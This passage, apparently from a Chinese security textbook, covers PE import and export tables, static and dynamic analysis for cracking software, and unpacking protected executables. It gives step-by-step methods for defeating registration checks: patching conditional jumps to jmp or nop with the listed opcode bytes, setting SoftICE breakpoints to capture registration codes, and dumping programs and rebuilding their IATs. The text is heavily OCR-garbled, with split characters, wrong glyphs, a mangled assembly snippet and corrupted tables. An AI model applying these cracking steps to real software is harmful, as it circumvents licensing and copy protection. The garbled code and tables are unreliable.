Name DWORD ?0Ch 4Byte ”被 输入 DLL 的 RVA 
FirstThunk DWORD ;10h 4Byte ”输入 地 址 表 的 RVA 


IMAGE IMPORT DESCRIPTOR ends 


OriginalFirstThunk 与 FirstThunk 非常 类 似 , 它们 指向 两 个 本 质 上 相同 的 数组 
IMAGE_THUNK_DATA, 这 些 数 组 有 好 几 种 叫 法 ,但 最 常见 的 名 字 是 输入 名 称 表 (Import 
Name Table, INT) 和 输入 地 址 表 (Import Address Table, IAT)。IAT 有 的 时 候 因为 脱 壳 
会 被 损坏 , 或 者 由 于 使 用 了 特殊 的 压缩 或 生成 的 PE 文件 ,导致 没有 或 者 是 被 修改 的 IAT。 

输入 表 是 加 这 与 脱 壳 的 重要 地 方 ,也 是 病毒 或 恶意 代码 (如 DLL) 注 入 控制 的 重要 
之 处 。 

4. 输出 表 (Export Table) 

输出 表 一 般 存在 于 DLL 文件 和 极 少数 的 EXE 文件 中 。 当 创建 一 个 DLL 时 ,实际 上 创 
建 了 一 组 能 被 EXE 或 其 他 DLL 调用 的 函数 ,这 种 能 被 其 他 的 EXE 或 DLL 文件 使 用 的 函 
数 称 为 (该 文件 的 ) 输 出 函数 。 输 出 函数 的 名 称 .输出 序号 和 入 口 地址 等 信息 都 存放 在 输出 
表 中 。 

当 PE 装载 器 执行 一 个 程序 , 它 将 相关 DLLs 都 装 入 该 进程 的 地 址 空间 ,然后 根据 主 程 
序 的 引入 函数 信息 ,查找 相关 DLLs 中 的 真实 函数 地 址 来 修正 主 程序 。PE 装载 器 搜寻 的 是 
DLLs 中 的 引出 函数 。 

DLL/EXE 要 引出 一 个 函数 给 其 他 DLL/EXE 使 用 有 两 种 实现 方法 : 通过 函数 名 引出 
或 者 仅仅 通过 序号 引出 。 序 号 是 唯一 指定 DLL 中 某 个 函数 的 16 位 数字 ,在 所 指向 的 DLL 
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里 是 独一无二 的 。 仅 仅 通 过 序号 引出 函数 这 种 方法 会 带 来 DLL 维护 上 的 问题 ,一 旦 DLL 
升级 /修改 ,程序 员 无 法 改变 函数 的 序号 ,调用 该 DLL 的 其 他 程序 都 将 无 法 工作 。 

在 IMAGE_DATA_DIRECTORY 结构 中 ,DataDirectory 结构 数组 的 第 一 个 元 素描 述 
的 就 是 输出 表 , 第 二 个 元 素描 述 的 是 输入 表 。 其 中 VirtualAddress 就 是 输出 表 的 偏 移 地 
址 ,Size 是 输出 表 的 大 小 。 

输出 表 是 数据 目录 的 第 一 个 成 员 , 又 可 称 为 IMAGE_EXPORT_DIRECTORY。 该 结构 中 
共有 11 个 成 员 , 常 用 的 有 nName( 模 块 的 真实 名 称 )、nBase( 基 数 ) 和 NumberOfFunctions 
(模块 输出 的 函数 总 数 ) 等 。 

PE 文件 的 其 他 部 分 如 节 块 描述 ,输入 地 址 表 (IAT) 、 绑 定 输入 、 基 址 重 定位 表 (BRT)、 
输出 转向 和 资源 等 请 参考 有 关 书 籍 。 


7.3.3 软件 静态 分 析 技 术 


软件 静态 分 析 是 一 门 通过 分 析 软 件 的 源 代码 来 找 出 代码 中 质量 问题 的 技术 。 如 果 要 在 
第 一 时 间 发 现 并 纠正 缺陷 ,软件 静态 分 析 技术 是 最 合适 的 方法 。 因 此 ,软件 静态 分 析 技 术 成 
为 在 软件 开发 编码 阶段 首要 使 用 的 软件 质量 保证 手段 ,这 种 手段 也 可 用 于 破解 被 保护 的 
软件 。 

1. 静态 分 析 概 念 

目前 ,大 多 数 软件 在 设计 时 都 采用 了 人 机 对 话 方式 。 所 谓 人 机 对 话 , 即 在 软件 运行 过 程 
中 ,计算 机 显示 并 等 待 用 户 按键 选择 的 提示 信息 ;或 再 显示 一 串 提 示 信 息 ,以 反映 该 段 程序 
运行 后 的 正常 还 是 错误 状态 ,提示 用 户 进行 下 一 步 处 理 的 帮助 信息 。 因 此 ,如 果 对 静态 反 汇 
编 出 来 的 程序 清单 进行 阅读 ,用 户 就 可 了 解 软 件 的 编程 思路 ,以 便 顺利 破解 。 常 用 的 静态 分 
析 工 具 是 W32DASM 和 HIEW 等 。 

所 谓 静态 分 析 即 阅读 软件 使 用 说 明和 反 汇 编 出 来 的 程序 清单 ,从 提示 信息 入 手 进 行 分 
析 跟 踪 数 据 变 化 过 程 和 控制 过 程 ,对 代码 有 一 个 初步 认识 。 

静态 分 析 破 解 就 是 通过 对 软件 的 静态 分 析 查 找 注册 或 验证 身份 的 代码 和 断 点 ,对 代码 
进行 适当 修改 来 破解 被 保护 的 软件 。 

2. 软件 静态 分 析 技 术 发 展 

早期 的 静态 分 析 技 术 是 代码 审查 ,能 够 分 析 如 下 类 型 的 问题 : 赋值 次 序 问题 ,拼写 错 
误 、 被 0 除 , 失 败 case 语句 (遗漏 了 break 语句 ) .不 可 移植 的 代码 、 宏 定义 参数 没 用 而 使 用 
圆 括号 、 符 号 的 丢失 、 异 常 的 表达 式 、 变 量 没有 初始 化 、 可 疑 的 判断 语句 的 格式 检查 等 ,已 经 
考虑 到 了 对 复杂 的 语义 进行 分 析 , 以 发 现 更 多 的 软件 缺陷 。 由 于 其 算法 的 特殊 性 、 分 析 占 用 
的 时 间 和 资源 等 问题 ,分 析 性 能 不 高 , 误 报 现象 严重 ,分 析 过 程 通常 很 慢 , 仅 作为 软件 开发 过 
程 的 一 个 可 有 可 无 的 过 程 。 但 是 人 工 方式 的 代码 审查 具有 很 强 的 不 可 靠 性 , 随 着 复杂 度 增 
加 ,错误 会 淹没 在 代码 里 ,同时 人 工 方式 耗 时 耗 力 ,容易 犯错 误 。 

静态 分 析 方 法 发 展 到 词法 分 析 阶 段 ,首先 对 源 代码 进行 打 标 记 , 这 个 过 程 如 同 编 译 过 程 
的 第 一 个 步骤 ,然后 将 生成 的 标记 文件 与 缺陷 结构 库 中 的 内 容 进 行 比 对 来 发 现 缺陷 。 早 期 
很 多 静态 分 析 工具 采用 这 种 方法 ,如 ITS4、FlawFinder 和 RATS 等 。 由 于 没有 考虑 目标 代 
码 的 语义 ,不 能 很 好 地 理解 代码 执行 时 的 行为 ,这 种 方法 还 是 产生 很 多 误 报 。 

新 一 代 静 态 分 析 方 法 的 理论 基础 是 程序 分 析 (Program Analysis) 技 术 。 使 用 静态 技术 
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对 程序 执行 时 状态 和 行为 的 集合 进行 预测 。 但 程序 分 析 包括 运行 时 错误 是 不 可 判定 的 , 没 
有 固定 \ 可 靠 的 方法 能 够 真正 回答 程序 是 不 是 有 运行 时 错误 ,这 是 数学 理论 上 的 NP 问题 。 
因此 ,新 一 代 静 态 分 析 方 法 采用 了 替代 的 方法 ,简化 所 有 的 程序 分 析 问 题 成 为 可 以 跟踪 和 计 
算 的 问题 。 分 析 原 则 是 使 用 许多 抽象 的 程序 约束 来 映射 源 代码 的 结构 。 

静态 分 析 系 统 PREfix、SLAM 使 用 了 数据 流 分 析 的 思想 ,Cqual 使 用 了 基于 约束 的 思 
想 ,ASTREE 是 抽象 解析 的 静态 检查 器 。 

3. 静态 分 析 基 本 方法 

(1) 阅读 软件 使 用 说 明 。 破 解 软件 首先 应 该 先 试用 一 下 这 个 软件 ,了 解 软件 功能 是 否 
有 限制 ,最 好 阅读 一 下 软件 的 说 明 或 手册 ,特别 是 自己 所 关心 的 关键 部 分 的 使 用 说 明 , 查 找 
破解 线索 。 

(2) 软件 反 汇编 与 预 处 理 。 使 用 工具 对 目标 软件 的 可 执行 BIN 代码 进行 反 汇编 ,再 对 
反 汇编 后 的 代码 进行 标注 、 切 块 和 翻译 等 预 处 理 ,得 到 类 C 代码 ,之 后 采用 静态 分 析 方 法 和 
动态 分 析 方法 对 类 C 代码 进行 分 析 , 得 到 软件 结构 算法 ,达到 分 析 目 的 。 

(3) 词法 和 语法 分 析 。 最 基本 的 分 析 首 先是 词法 和 语法 分 析 。 通 过 分 析 程 序 代 码 中 的 
分 支 情况 ,循环 情况 、 调 用 关系 、 语 句 含 义 和 变 量 之 间 的 联系 等 ,初步 认识 代码 功能 ,并 进行 
注释 。 还 可 以 通过 注释 检查 结果 类 型 是 否 正确 。 

(4) 程序 切片 。 针 对 较 长 的 程序 段 ,根据 程序 中 的 跳 转 语句 、 判 断 语句 等 将 程序 分 成 较 
小 的 片段 。 小 片段 涉及 代码 少 且 功能 单一 ,理解 更 为 容易 ,唯一 不 足 的 是 要 关注 变量 取 值 和 
上 下 文 关 系 。 程 序 切 片 可 以 使 用 工具 帮助 完成 。 

(5) 数据 流 分 析 。 将 程序 看 作 是 图 ,节点 是 程序 的 基本 块 , 边 是 描述 控制 如 何 从 一 个 基 
本 块 转移 到 另 一 个 基本 块 。 采 用 图 形 和 表格 清晰 表达 程序 的 功能 模块 变量 或 对 象 之 间 的 
关系 。 面 向 对 象 软件 的 模块 或 组 件 之 间 关 系 比较 复杂 ,包括 继承 、 泛 化 ,访问 和 多 态 等 ,所 以 
常 采用 类 图 ,协作 图 等 表示 不 同 对 象 或 类 之 间 的 关系 ,传统 的 软件 中 一 般 采 用 流程 图 .结构 
图 等 表示 程序 的 功能 模块 之 间 的 关系 或 内 部 流程 。 

在 反 汇编 的 代码 中 ,指针 已 经 转换 为 地 址 ,所 以 在 分 析 的 过 程 中 重点 分 析 数 组 和 结构 
体 。 很 多 以 “ 基 址 十 偏 移 " 方 式 存 在 的 数据 长 度 一 致 且 地 址 连续 ,可 以 认定 为 数组 ,如 果 长 度 
不 一 致 或 变量 类 型 不 同 则 认定 为 结构 体 。 

循环 ,控制 语句 是 软件 算法 的 另 一 个 重要 组 成 部 分 ,通过 它们 可 以 有 效 地 分 析 程 序 的 数 
据 流 和 控制 流 ,从 而 达到 对 程序 功能 的 理解 。 常 用 的 循环 .控制 语句 有 while、for、if 和 
switch 等 ,在 分 析 时 主要 查看 其 判断 条 件 和 循环 执行 条 件 。 

(6) 复 用 代码 分 析 。 复 用 代码 指 代码 中 重复 出 现 的 代码 段 或 函数 功能 段 ,对 它们 的 大 
小 .次数 .上 下 文 信息 等 进行 深入 分 析 , 能 够 帮助 更 好 地 理解 使 用 这 些 重复 代码 的 程序 功能 。 

其 他 分 析 方法 如 基于 约束 的 分 析 是 从 程序 文本 产生 一 系列 的 本 地 约束 ,通过 解 译 这 些 
约束 来 验证 所 有 的 属性 。 抽 象 解析 是 将 程序 映射 成 更 加 抽象 的 域 (Domain) ,使 分 析 更 加 具 
有 可 跟踪 性 并 具有 检验 代码 的 作用 。 抽 象 解析 通过 计算 能 够 直接 得 出 分 析 结 果 ,而 不 是 使 
用 验证 的 方式 进行 分 析 。 

4. 软件 静态 分 析 破 解 步骤 

先 将 加 密 保护 软件 进行 反 汇编 ,然后 按 功 能 模块 查找 原 代 码 中 可 能 的 保护 点 ,根据 字符 
参考 回溯 一 段 代码 , 找 出 一 个 或 多 个 可 疑 的 跳 转 ,这 里 可 能 就 是 破解 的 关键 地 方 。 破 解 常用 
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的 汇编 指令 和 修改 如 表 7. 3 和 表 7.4 所 示 。 
表 7.3 破解 常用 的 汇编 指令 


汇编 指令 作 用 汇编 指令 作 用 
Cmpa,b 比较 a 与 b Mov a,b 将 b 值 赋 给 a 

ret 返回 主 程序 nop 空 操作 ,机 器 码 为 90 

Call x 调用 x 子 程序 Je 或 jz 车 相等 则 跳 转 (74/0f84) 
jmp 无 条 件 跳 转 (eb) Jne 或 jnz 若 不 相等 则 跳 转 (75/0f85) 
jb 若 小 于 则 跳 转 ja 若 大 于 则 跳 转 

jg 若 大 于 则 跳 转 jge 若 大 于 等 于 则 跳 转 

jl 若 小 于 则 跳 转 jle 若 小 于 等 于 则 跳 转 

Pop xx Xx 出 栈 Push xx Xx 压 栈 


表 7.4 破解 常见 的 修改 表 


汇编 指令 修改 相应 的 机 器 码 修改 汇编 指令 修改 相应 的 机 器 码 修改 
Jnz/jne—>nop 75 一 之 90 Jnz/jne—>jmp 75—>EB 
Jz/je—>nop 74 一 二 90 Jz/je—>jmp 74 一 >>EB 
Jnz—>jz 75 一 >>74 或 0F85 一 >>0F84 jz 一 二 jnz 74 一 >>75 或 0F84 一 >>0F85 
Jne 一 二 je 75 一 >>74 或 0F85 一 >>0F84 je 一 二 jne 74 一 >>75 或 0F84 一 >>0F85 


静态 分 析 破 解 的 一 般 步骤 如 下 : 

(1) 查阅 软件 的 说 明 书 , 弄 清 注 册 与 不 注册 的 软件 功能 区 别 以 及 如 何 注册 ; 

(2) 运行 软件 , 试 注册 ,记录 提示 的 成 功 或 错误 信息 ; 

(3) 用 工具 软件 侦 测 有 无 加 这 ,车 有 则 先 用 相应 的 工具 软件 脱 壳 ; 

(4) 用 反 汇编 工 具 如 W32Dasm 进行 反 汇编 ; 

(5) 在 串 式 参考 中 找到 错误 提示 信息 或 可 能 是 正确 的 提示 信息 ; 

(6) 在 反 汇编 工具 中 分 析 相 应 汇编 , 找 出 关键 跳 转 和 关键 call ,分 析 程 序 流程 ; 

(7) 找到 关键 跳 转 的 偏 移 地 址 (实际 修改 地 址 ) ; 

(8) 用 十 六 进 制 编辑 器 如 ultraedit 查找 偏 移 地 址 并 修改 机 器 码 后 保存 ; 

(9) 运行 破解 后 的 程序 ,没有 问题 则 静态 分 析 破解 成 功 。 

有 两 种 不 同 的 修改 办 法 : 

(1) 将 条 件 跳 转 修改 为 无 条 件 跳 转 。 将 je(jne,jz,jnz) 跳 转 改 为 jmp, 从 而 跳 过 出 错 处 
理 , 如 图 7.2 所 示 。 

(2) 将 条 件 跳 转 改 为 空 操作 。 将 je(jne,jz,jnz) 跳 转 改 为 nop, 从 而 跳 过 正确 信息 的 处 
理 , 如 图 7.3 所 示 。 

反 汇 编 工 具有 W32Dasm DJ Java Decompiler 2.9 和 ildasm( 用 于 . net 软件 ) 等 。 利 用 
这 些 工 具 进行 破解 的 实例 请 参看 雪 论 坛 精华 或 有 关 书 籍 。 
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出 错 信息 正确 信息 


1 1 
正确 信息 出 错 信息 


图 7.2 绕 过 出 错 信息 图 7.3 的 断 出 错 信息 的 跳 转 


7.3.4 动态 分 析 破解 技术 


静态 分 析 可 以 了 解 程序 的 思路 ,但 是 无 法 真正 了 解 软 件 的 执行 细节 。 如 果 静 态 分 析 找 
不 出 线索 ,不 能 得 到 正确 的 注册 码 ,破解 的 功能 不 完善 ,只 能 称 为 暴力 破解 。 

软件 大 多 在 整体 上 是 功能 模块 化 设计 的 ,执行 时 后 一 模块 往往 需要 使 用 其 前 一 模块 处 
理 的 结果 , 称 为 中 间 结 果 ,静态 分 析 一 般 是 很 难 分 析出 软件 的 这 些 中间 结 果 的 ;其 次 ,程序 的 
分 支 和 转移 条 件 在 执行 过 程 中 是 变化 的 ,分 支 转移 条 件 一 般 由 之 前 的 程序 来 产生 ,要 确定 程 
序 运行 到 底 该 转向 哪 一 分 支 , 不 进行 动态 的 跟踪 和 分 析 是 很 难得 知 的 ;再 次 ,最 初 执行 的 一 
段 程序 往往 需要 对 该 软件 的 后 面 各 个 模块 进行 一 些 初 始 化 工作 ,而 没有 依赖 系统 的 重 定位 ; 
最 后 ,为 了 阻止 非法 跟踪 和 阅读 ,对 执行 代码 的 大 部 分 内 容 进 行 了 加 密 变 换 ,程序 运行 时 ,对 
加 密 部 分 采用 了 逐 块 解密 逐 块 执行 的 方法 ,而 程序 在 运行 过 程 中 不 仅 要 完成 阻止 跟踪 的 任 
务 , 还 要 负责 对 下 一 块 密码 进行 解密 ,显然 静态 分 析 是 无 法 分 析 这 段 代 码 的 。 

由 于 上 述 原因 ,如 果 静 态 分 析 找 不 出 线索 ,就 要 进行 动态 程序 分 析 。 

1. 动态 分 析 概念 

所 谓 动态 分 析 是 利用 SOFTICE 或 TRW2000 等 工具 动态 跟踪 程序 软件 的 执行 过 程 ， 
包括 单 步 执行 或 分 段 执行 程序 ,查找 注册 或 验证 身份 的 代码 和 断 点 ,从 而 分 析 程 序 流 程 和 保 
护 结构 , 找 出 正确 的 注册 码 , 使 破解 软件 成 为 功能 正常 的 注册 软件 。 这 种 破解 称 为 完全 破 
解 。 动 态 分 析 还 能 用 于 对 压缩 程序 的 分 析 破 解 。 涉 及 动态 分 析 破 解 的 几 个 概念 如 下 : 

(1) 断 点 。 断 点 就 是 程序 被 中 断 的 地 方 。 中 断 是 由 于 有 特殊 事件 发 生 ,计算 机 暂停 当 
前 的 程序 , 转 而 执行 另外 的 中 断 服务 程序 去 处 理 特殊 事件 ,然后 再 返回 原先 的 程序 继续 执 
行 。 关 键 的 断 点 是 程序 获取 输入 的 注册 码 并 准备 和 正确 的 注册 码 相 比 较 的 程序 点 ,一 般 通 
过 跟踪 分 析 可 以 找 出 正确 的 注册 码 。 

(2) 领空 。 破 解 的 重要 概念 ,所 谓 程序 的 领空 是 指 在 某 一 时 刻 cpu 的 cs:ip(eip) 所 指 
向 的 某 一 段 代码 的 所 有 者 所 在 的 区 域 ,也 就 是 破解 者 要 破解 的 程序 代码 所 处 的 位 置 。 

(3) API。API 是 应 用 程序 编程 接口 (系统 定义 的 函数 集合 ), 它 提供 了 访问 操作 系统 
特征 的 方法 ,如 内 存 分 配 、 向 屏幕 输出 和 创建 窗口 等 ,用 户 的 程序 通过 调用 底层 API 接口 函 
数 来 实现 各 种 功能 。API 有 Win16 和 Win32 两 种 形式 ,16 位 的 API 函数 和 32 位 的 API 函 
数 的 区 别 在 于 最 后 的 一 个 字母 (A 是 32 位 单字 节 、W 是 32 位 双 字 节 )。Win32 API 函数 包 
含 在 动态 链接 库 kernel32. dll .user32. dll gdi32. dll 和 comectl32. dll 中 ,破解 中 常用 到 的 是 
Win32 单字 节 API 函数 。 

(4) 显 式 注册 码 和 隐 式 注册 码 。 显 式 注册 码 可 以 直接 在 程序 所 处 的 内 存 中 看 到 它 , 例 
如 可 以 直接 在 Softice 的 数据 窗口 中 看 到 类 似 297500523 的 注册 码 ,破解 比较 容易 。 隐 式 注 
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册 码 是 将 正确 注册 码 换算 成 整数 或 其 他 变换 ,或 者 分 拆 后 分 散在 程序 的 不 同 地 方 , 应 用 程序 
采取 各 种 不 同 的 复杂 运算 方式 来 回避 直接 的 注册 码 比较 。 通 常 正确 注册 码 以 这 两 种 形态 存 
在 于 程序 代码 中 。 

2. 动态 分 析 方 法 

动态 分 析 监 视 并 获取 系统 运行 时 产生 的 动态 信息 ,主要 有 两 种 实现 方式 : 

(1) 植 和 法。 采用 在 源 代 码 或 二 进 制 代码 中 植 人 (Instrument) 语 句 或 数据 ,方便 跟踪 
调试 。 目 前 各 种 工具 中 收集 动态 信息 都 是 利用 代码 的 结构 信息 ,依据 固定 的 规则 ,将 软件 触 
发 器 添加 到 代码 中 。 软 件 触发 器 是 指 在 源 程 序 中 相应 的 位 置 添加 的 一 些 代码 ,这 些 代 码 运 
行 时 按 特定 协议 将 指定 的 动态 信息 传递 到 指定 位 置 或 信息 收集 机 制 , 从 而 提供 产生 动态 模 
型 所 需 的 对 象 之 间 的 消息 传递 信息 。 

(2) 调试 器 法 。 调 试 器 (Debug-ger) 使 用 户 可 以 在 程序 运行 时 控制 代码 的 执行 ,检查 并 
获得 程序 状态 以 及 变量 的 值 等 动态 信息 。 通过 调试 器 运行 程序 获取 信息 的 途径 有 : 

@ 设置 断 点 。 当 代码 的 流程 比较 复杂 时 ,可 以 设置 断 点 单 步 跟 踪 程 序 流 程 ,查看 变量 
值 的 变化 过 程 ,帮助 程序 功能 理解 。 常 用 的 设置 断 点 方法 有 代码 定位 断 点 ,数据 断 点 和 条 件 
断 点 ,分别 跟踪 代码 的 运行 .内 存 数据 和 条 件 判断 。 

@ 内 存 修改 。 通 过 运行 代码 找到 对 应 内 存 地 址 ,修改 内 存 值 ,观察 修改 后 程序 运行 的 
变化 ,从 而 判断 数据 的 意义 。 

@ 代码 屏蔽 。 屏 项 一 段 代 码 ,观察 程序 运行 时 的 变化 ,判断 被 屏 项 的 代码 段 的 功能 ;或 
屏蔽 因 条 件 不 足 无 法 正常 执行 的 某 段 代码 。 屏 项 代码 方法 可 以 采用 NOP 覆盖 ,或 者 修改 
栈 地 址 中 函数 返回 地 址 ,对 于 中 断 可 以 设置 硬件 中 断 屏 蔽 等 。 

@ 改变 程序 流程 。 再 通过 分 析 输 入 输出 数据 理解 程序 功能 。 

要 有 效 地 进行 动态 跟踪 分 析 , 首 先 要 对 软件 进行 粗 跟 踪 , 即 在 跟踪 时 要 大 块 大 块 地 跟 
踪 , 也 就 是 说 每 次 遇 到 调用 CALL 指令 .重复 操作 指令 REP、 循 环 操作 LOOP 指令 以 及 中 
断 调用 INT 指令 等 ,一 般 不 要 跟踪 进去 ,而 是 根据 执行 结果 分 析 该 段 程序 的 功能 。 其 次 要 
对 关键 部 分 进行 细 跟 踪 , 粗 跟踪 获取 了 软件 中 破解 者 所 关心 的 模块 或 程序 段 ,可 以 针对 性 地 
对 该 模块 进行 具体 而 详细 地 跟踪 分 析 。 

一 般 情况 下 ,对 关键 代码 的 跟踪 可 能 要 反复 进行 若干 次 才能 读 懂 该 程序 ,每 次 要 把 比较 
关键 的 中 间 结 果 或 指令 地 址 记录 下 来 ,帮助 下 一 次 分 析 。 

3. 动态 分 析 破 解 的 一 般 步骤 

程序 内 部 通常 都 会 利用 一 个 子 程序 ( 即 CALL XXXXXXXX) 去 验证 用 户 输入 的 注册 码 
正确 与 否 , 显 式 注册 码 一 般 都 会 将 所 输入 的 注册 码 和 正确 注册 码 放 进 寄存 器 ,然后 调用 验证 
子 程序 进行 判断 是 否 注册 成 功 。 判 断 程序 的 形式 常常 如 下 : 


MV EAX,[ ] ;或 POP ERX 

MV EDx,[ ] ;或 POP EDX 

CRLL 。 XXXXXXXX ;关键 子 程序 调用 

TEST EAX, EAX ;或 亚 ST AL, AL, 或 是 CMP EAX, EDX, 或 者 没有 该 句 等 形式 
UNZ .XXXAXXX ;或 (TE/TE) XXXXXXXX 


其 中 EAX 和 EDX( 或 者 ECX、EBX、EDI 和 ESI 等 ) 指 向 的 内 存 区 域 就 是 用 户 输入 的 注 
册 码 和 正确 注册 码 ,EAX 等 是 16 位 寄存 器 AX 的 扩展 。 在 Windows 的 保护 模式 下 cs、ds、 
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es\ss\fs 和 gs 等 叫 段 选择 器 。 隐 式 注册 码 破解 时 就 需要 进入 子 程序 去 分 析 注 册 算法 。 

动态 分 析 破 解 一 般 采 用 Trw2000 .Ollydbg( 动 静 合 一 ) 等 工具 进行 跟踪 分 析 ,步骤 如 下 : 

(1) 打开 动态 跟踪 分 析 工 具 软 件 ; 

(2) 打开 待 破解 的 软件 程序 运行 到 注册 处 ,随便 输入 注册 码 ( 如 12345678 ,不 按 Enter 
键 确定 ); 

(3) 用 热 键 呼出 跟踪 程序 ,设置 中 断 跟踪 ; 

(4) 回 到 注册 窗口 ,确认 输入 注册 码 ( 按 Enter 键 确认 ); 

(5) 跟踪 搜索 到 被 破解 程序 “注册 失败 ”, 记 下 位 置 ; 

(6) 重复 (1) 一 (6) ,跟踪 搜索 到 被 破解 程序 “注册 失败 ”的 上 一 步 , 记 下 位 置 ; 

(7) 从 该 位 置 开 始 单 步 跟 踪 ,查找 关键 call 和 跳 转 ; 

(8) 查看 eax 和 edx 寄存 器 的 值 ,往往 就 是 注册 码 或 注册 码 的 地 址 等 重要 信息 ; 

(9) 如 果 没 有 找到 ,就 需要 进入 call 的 子 程序 ,重复 上 面 (7) 一 (8) 的 跟踪 过 程 。 

4. 如 何 设置 断 点 

正确 恰当 的 设置 好 断 点 对 于 快速 有 效 的 解密 非常 重要 ,好 的 断 点 设置 可 以 使 破解 者 迅 
速 找到 关键 的 程序 段 , 而 不 恰当 的 断 点 则 会 对 解密 造成 不 必要 的 精力 消耗 ,甚至 根本 就 不 能 
拦截 到 程序 的 运行 。 在 要 切入 程序 的 时 候 想 中 断 程序 ,就 必须 不 依赖 具体 的 程序 设置 断 点 ， 
也 就 是 设置 的 断 点 应 该 是 每 个 程序 都 会 用 到 的 代码 点 。 设 置 断 点 通常 是 用 来 拦截 到 系统 
Win32 API 函数 调用 ,如 对 话 框 ( 如 bpx DialogBox) 和 消息 框 ( 如 bpx MessageBox(A)) 等 。 

例如 在 Softice 中 设置 下 面 的 断 点 : bpx、bpx GetDlgItemTextA 和 bpx 
GetDlgltemTextW( 获 取 对 话 框 文 本 ), 当 待 破解 的 程序 要 读 取 输入 的 数据 而 调用 
GetDlgItemText 时 ,立即 被 SOFTICE 拦截 到 , 待 破解 的 程序 停留 在 GetDlgItemText 的 程 
序 区 ,而 GetDlgItemText 是 处 于 Windows 自己 管理 的 系统 区 域 。 要 在 Softice 工具 中 用 
exp 二 C:\windows\system\kernel32. dll 等 命令 行将 这 些 动态 链接 库 导入 Softice 中 。 

具体 怎么 利用 合适 的 断 点 很 难说 ,要 自己 用 经 验 去 累积 ,如 bpx lockmytask 这 个 断 点 
的 作用 是 拦截 任何 一 个 按键 的 动作 ,bpx hmemcpy 是 一 个 万 能 断 点 ,初学 者 不 妨 多 试 试 这 
个 断 点 。 学 习 破 解 需要 大 量 的 练习 ,初学 者 不 宜 以 加 密 较为 复杂 的 大 型 软件 为 目标 ,应 该 选 
择 一 些小 型 共享 软件 来 练习 。 


7.3.5 脱 壳 技 术 


软件 加 壳 一 方面 是 保护 版 权 信 息 , 躲 避 杀 毒 软件 的 查 杀 或 跟踪 等 , 另 一 方面 压缩 代码 方 
便 存 储 传输 。 壳 是 一 段 先 于 原始 程序 执行 的 代码 ,隐藏 了 原 程序 真正 的 入口 点 OEP。 壳 的 
执行 会 把 压缩 ,加密 后 的 代码 还 原 成 原 程序 代码 ,然后 再 把 执行 权 交 还 给 原 程序 代码 。 

脱 壳 的 基本 原则 就 是 单 步 跟 踪 , 只 能 往 前 ,不 能 往 后 。 脱 壳 的 一 般 流程 是 : 查 壳 一 寻找 
OEP 一 Dump 习 修复 输入 地 址 表 IAT。Dump 就 是 将 在 特定 时 刻 内 存 一 块 区 域 中 的 信息 复 
制 转 储 到 一 个 文件 ,以 便 查阅 。 内 存 信 息 如 核心 模式 下 的 调试 信息 一 般 是 看 不 见 的 ,可 以 使 
用 Dump 导出 来 。 

查找 OEP 时 , 先 看 沉 是 加 密 壳 还 是 压缩 沉 , 压 缩 这 一般 是 没有 异常 的 ,找到 对 应 的 pop 
ad 后 就 能 到 入 口 。 跳 到 入 口 的 方式 一 般 为 jmp OEP、push OEP ret、call OEP, 也 有 其 他 如 
je OEP 等 ,一般 都 是 段 之 间 的 大 跳 转 ,所 以 更 好 区 别 是 否 是 段 间 跳 转 。 
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如 果 是 加 密 壳 ,就 要 分 析 加 密 软 件 的 名 称 、 版 本 ,因为 不 同 软件 其 至 不 同 版 本 加 的 壳 , 脱 
壳 处 理 的 方法 都 不 相同 。 一 般 用 OllyDebug 载 入 加密 壳 , 钓 掉 所 有 异常 (过 多 可 以 适当 忽 
略 一 些 ) ,跟踪 运行 ,记录 按 Shift 十 F9 组 合 键 程序 运行 的 次 数 , 显 然 最 后 一 次 异常 后 ,程序 
会 从 壳 跳 到 OEP 开始 执行 ,这 是 寻找 OEP 的 一 个 关键 。 

找到 OEP 后 就 可 以 Dump 了 。 先 修改 Imagesize, 再 用 LordPE 来 Dump。 

最 后 就 是 修复 输入 地 址 表 IAT。 由 于 加 密 壳 对 输入 表 进 行 了 重 定位 ,因此 Dump 的 文 
件 不 能 正常 使 用 ,需要 恢复 IAT。 先 用 ImportREC 填 入 正确 的 OEP( 可 能 无 效 ), 记 下 IAT 
的 地 址 ,重新 运行 ,在 OllyDebug 的 Dump 窗口 里 Go to Expression 到 IAT, 选 择 用 内 存 断 
点 或 硬件 断 点 查看 eax 的 值 ,修改 je 为 jmp, 再 到 OEP 处 用 ImportREC 修复 。 

现在 脱 壳 一 般 分 为 手动 和 自动 两 种 ,手动 就 是 用 Trw2000、TR、Softice 等 调试 工具 对 
付 , 对 脱 过 者 有 一 定 水 平 要 求 , 涉 及 很 多 汇编 语言 和 软件 调试 方面 的 知识 。 而 自动 就 是 用 专 
门 的 脱 这 工具 来 脱 , 有 对 应 压缩 软件 专用 脱 过 工具 ,如 UPX( 可 自 解压 ),Aspack 加 壳 对 应 
Unaspack 脱 壳 ;有 专业 的 脱 壳 工具 如 ProcDump v1. 62, 可 对 付 各 种 压缩 软件 的 压缩 文档 。 
如 果 知 道 文件 的 加 密 方式 ,就 可 以 使 用 不 同 的 工具 ,不 同 的 方法 进行 脱 壳 ,如 表 7.5 所 示 。 


表 7.5 对 应 加 壳 工 具 的 脱 壳 工具 


加 壳 工 具 对 应 脱 壳 工具 备注 
Aspack UNASPACK/PEDUMP32/caspr 用 的 最 多 ,caspr 脱 壳 后 的 文件 为 * .ex_ 
外 软件 多 用 它 加 壳 , 脱 过 需要 一 定 的 专 
ASProtect+aspack | SOFTICE+ICEDUMP 它 加 这 , 脱 这 需要 一 定 的 专 
Upx UPX 注意 版 本 一 致 ,用 -D 参数 
Armadill SOFTICE+ICEDUMP 
Dbpe 国内 比较 好 的 加 密 软 件 
NeoLite NeoLite 
Peguard SOFTICE+ICEDUMP+FROGICE 
Pp Unpecompact 
Es (SOFTICE 十 PEDUMP32) 
PEDUMP32 
ed 
Petite (SOFTICE+ICEDUMP) 过 要 汪 的 专业 知识 
WWpack32 PEDUMP32 十 SOFTICE 
软件 脱 过 常用 工具 有 : 


(1) 文件 分 析 工 具 ( 侦 测 壳 的 类 型 ): Fi、GetTyp、peid、pe-scan。 

(2) OEP 入 口 查找 工具 : Softice、,TRW、Ollydbg loader .peid。 

(3) dump 工具 : IceDump、TRW 、PEditor、ProcDump32、LordPE。 

(4) PE 文件 编辑 工具 PEditor、ProcDump32、LordPE。 

(5) 重建 Import Table 工具 : ImportREC ReVirgin。 

(6) ASProtect 脱 壳 专用 工具 : Caspr(ASPr V1. 1-V1.2 有效) .Rad( 只 对 ASPr V1.1 
有 效 ) ,loader 和 peid。 
